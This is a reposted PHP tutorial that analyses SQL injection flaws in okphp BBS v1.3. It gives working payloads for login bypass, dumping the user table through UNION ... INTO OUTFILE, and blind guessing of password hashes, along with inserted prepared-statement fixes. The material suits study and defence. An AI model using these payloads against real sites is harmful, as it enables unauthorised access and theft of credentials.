Attack method: Discussion on PHP+MySQL injection statement construction (PHP tutorial)

Source: Internet
Author: User
I. Preface:

Version info: okphp BBS v1.3 Open source version

Because of characteristics of PHP and MySQL themselves, PHP+MySQL injection is harder than ASP injection, and constructing the statement at injection time is the hardest part. This article briefly analyses a few files of okphp BBS v1.3 to discuss how PHP+MySQL injection statements are constructed; I hope it is of some help to you.

Disclaimer: none of the "vulnerabilities" mentioned in this article has been tested and they may not exist at all. In fact, whether a vulnerability exists is not important; what matters is the way of analysing and of constructing the statements.

II. Vulnerability Analysis:

1. Injection in admin/login.php allows the authentication to be bypassed:

Code:

$conn = sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q, $conn);
$row = sql_fetch_row($res);

$q = "select id,group_id from $user_table where username='$username' and password='$password'";

$username and $password are not filtered, so the check is easily bypassed.

For a statement such as SELECT * from $user_table where username='$username' and password='$password', the query can be altered like this:

Construction 1 (with a logical operator): $username = ' or 'a'='a    $password = ' or 'a'='a

Equivalent SQL statement:

SELECT * from $user_table where username='' or 'a'='a' and password='' or 'a'='a'

Construction 2 (use the MySQL comment markers # or /* to comment out the $password condition): $username = admin'# (or admin'/*)

That is:

SELECT * from $user_table where username='admin'# and password='$password'

Equivalent:

SELECT * from $user_table where username='admin'

In admin/login.php, $password in the $q statement is MD5-hashed before the query, so the password half of Construction 1 cannot be used; here we use Construction 2:

select id,group_id from $user_table where username='admin'# and password='$password'

Equivalent:

select id,group_id from $user_table where username='admin'

This works as long as a user named admin exists. If the user name is unknown but the corresponding id is known, we can construct:

$username = ' or id=1#

Equivalent:

select id,group_id from $user_table where username='' or id=1# and password='$password'   (everything after # is commented out)

We then look at the code that follows:

if ($row[0]) {
    // if not admin or super moderator
    if ($username != "admin" && !eregi("(^|&)3($|&)", $row[1])) {
        $login = 0;
    } else {
        $login = 1;
    }
}

// fail to login ---------------
if (!$login) {
    write_log("Moderator login", "0", "password wrong");
    echo "";
    exit();
}
// access! -------------
else {
    session_start();
    // ... (rest omitted)
}

In the end, login is decided by a simple test of $login, so as long as we submit $login=1 directly from the browser we can bypass it :)

2. Injection in users/login.php allows the authentication to be bypassed:

Code:

$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'";
$res = sql_query($q, $conn);
$row = sql_fetch_row($res);

$username is not filtered; the same method as in vulnerability 1 applies.

3. adminloglist.php allows arbitrary deletion of log records. (PS: this has nothing to do with PHP+MySQL injection; it is mentioned in passing.)

The okphp backend seems to be written very sloppily: none of the files checks whether the administrator has logged in, so anyone can access them. Look at the list.php code:

$arr = array("del_log", "log_id", "del_id");
get_r($arr);
// ...
if ($del_log) {
    // ... omitted ...
    if ($log_id) {
        foreach ($log_id as $val) {
            $q = "delete from $log_table where id=$val";
            $res = sql_query($q, $conn);
            if ($res) {
                $i++;
            }
        }
    } elseif ($del_id) {
        $q = "delete from $log_table where id=$del_id";
        $res = sql_query($q, $conn);
    }
    $tpl->setVariable("message", "$i log deleted ok!");
    $tpl->setVariable("action", "index.php?action=list_log");
}

The code simply uses get_r($arr) to read the submitted parameters, so we only need to submit the corresponding $del_log, $log_id and $del_id and the deletion succeeds in the backend.
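For comparison, here is how the log-deletion branch above looks with the two missing controls added: an administrator session check and typed, parameterized ids. This is an added example, not okphp's code; $pdo is an assumed PDO connection opened elsewhere with ERRMODE_EXCEPTION, and log_table stands in for the page's $log_table.

```php
<?php
// Added example (not okphp's code). Assumes $pdo is a PDO connection with
// PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION; "log_table" is a placeholder.
session_start();
if (empty($_SESSION['admin_id'])) {
    // Every backend script must gate on the server-side session,
    // never on variables taken from the request.
    http_response_code(403);
    exit('admin login required');
}

// Only POST may change state, so a plain GET link cannot trigger a deletion.
if ($_SERVER['REQUEST_METHOD'] !== 'POST' || empty($_POST['del_log'])) {
    exit('nothing to do');
}

// Collect ids from both form fields (array log_id[] and scalar del_id),
// then keep only positive integers; anything else is dropped, not quoted.
$raw = $_POST['log_id'] ?? [];
if (!is_array($raw)) {
    $raw = [$raw];
}
if (isset($_POST['del_id'])) {
    $raw[] = $_POST['del_id'];
}
$ids = [];
foreach ($raw as $v) {
    $n = filter_var($v, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n !== false) {
        $ids[] = $n;
    }
}

// One prepared statement with a fixed WHERE clause, bound as INT and executed
// once per id: the value travels as data, so it can never extend the SQL text
// the way "where id=$val" interpolation allowed.
$deleted = 0;
if ($ids) {
    $stmt = $pdo->prepare('DELETE FROM log_table WHERE id = :id');
    foreach (array_unique($ids) as $id) {
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $deleted += $stmt->rowCount();
    }
}
echo "$deleted log record(s) deleted";
```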

4. Unfiltered variables in multiple files lead to SQL injection.

The authors of okphp do not seem to like filtering :). Basically every variable in the SQL statements is "naked". I will not list the specific files; please look at the code yourselves. I will briefly use forumslist_threads.php as an example.

Look at the list_threads.php code:

$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=$forum_id";
$res = sql_query($q, $conn);
$row = sql_fetch_row($res);

The variable $forum_id is not filtered. Because MySQL does not support subqueries, we use UNION to build a federated query (requires MySQL 4.00 or above) and so reach across tables; we construct the following:

Construction 1: use SELECT * FROM table INTO OUTFILE '/path/file.txt' (requires the MySQL account to have the FILE privilege; on Windows use an absolute path such as C://path//file.txt). The query result is written into file.txt, which we can then read at http://ip/path/file.txt. Accordingly, $forum_id can be constructed as:

$forum_id = union select * from user_table into outfile '/path/file.txt'

giving:

$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=$forum_id union select * from user_table into outfile '/path/file.txt'";

This approach is demanding: you have to know the web path (which can usually be obtained by submitting a wrong variable to provoke a MySQL error), and PHP's magic_gpc=on option prevents single quotes from appearing in the injection. If magic_gpc=on we can still bypass it:

Construction 2: just like cross-database queries in ASP, build the statement directly with UNION SELECT and infer the answer from the differing responses. This method continues the injection even when single quotes are blocked (magic_gpc=on), but in PHP this kind of injection is relatively difficult and depends on the specific code. Please refer to pinkeyes's article "PHP Injection Example" for the specific statement construction. I will give an example of a "different return" injection against okphp below (see vulnerability 5).

5. In admin/login.php and users/login.php, constructing the SQL statement lets us guess the specified user's password hash. (This is really the same as vulnerabilities 1 and 2; it is listed separately mainly to illustrate the method of statement construction.)

The problem code is the same as in vulnerability 1.

Statement construction (PS: since the statement itself already operates on the user table, no UNION is needed):

$username = admin' and length(password)=6#

The SQL statement becomes:

$q = "select id,group_id from $user_table where username='admin' and length(password)=6# and password='$password'"

Equivalent:

$q = "select id,group_id from $user_table where username='admin' and length(password)=6"

If length(password)=6 holds, the page returns normally; if not, MySQL returns an error.

So we can guess the admin user's password hash, for example with $username = admin' and ord(substring(password,1,1))=57#

which guesses the ASCII value of the first character of the user's password hash...
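Vulnerabilities 1, 2 and 5 all come from the same login query, so one hardened version of admin/login.php covers them. This is an added example, not okphp's code: it assumes a PDO connection, a user table with id, group_id, username and password columns (names are placeholders for the page's $user_table), and passwords stored with password_hash() instead of MD5.

```php
<?php
// Added example (not okphp's code). Connection settings and table/column
// names are placeholders standing in for the page's $user_table.
$dsn = 'mysql:host=localhost;dbname=okphp;charset=utf8mb4';
$pdo = new PDO($dsn, 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares: data never re-enters the SQL text
]);

// Inputs are read explicitly; nothing in the request can set $login,
// unlike the original where a submitted $login=1 was trusted.
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
$login    = 0;

// A placeholder replaces the "username='$username'" interpolation, so values
// such as admin'# or ' or 'a'='a are compared as literal strings and cannot
// change the WHERE clause or comment out the rest of the query.
$stmt = $pdo->prepare(
    'SELECT id, group_id, password FROM user_table WHERE username = :username LIMIT 1'
);
$stmt->execute([':username' => $username]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// The hash is verified in PHP rather than compared inside SQL, so the stored
// hash never takes part in the WHERE clause and the length()/ord(substring())
// guessing of vulnerability 5 has no condition to attach to.
if ($row !== false && password_verify($password, $row['password'])) {
    // Same role rule as the original eregi("(^|&)3($|&)"): the admin account
    // or a member of group 3 in the &-separated group_id list.
    $groups = explode('&', (string) $row['group_id']);
    if ($username === 'admin' || in_array('3', $groups, true)) {
        $login = 1;
    }
}

if ($login !== 1) {
    // Identical response for unknown user and wrong password: no user enumeration.
    error_log('Moderator login failed for ' . $username);
    http_response_code(403);
    exit('login failed');
}

session_start();
session_regenerate_id(true);
$_SESSION['admin_id'] = (int) $row['id'];
```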

Source: http://www.bkjia.com/PHPjc/486471.html
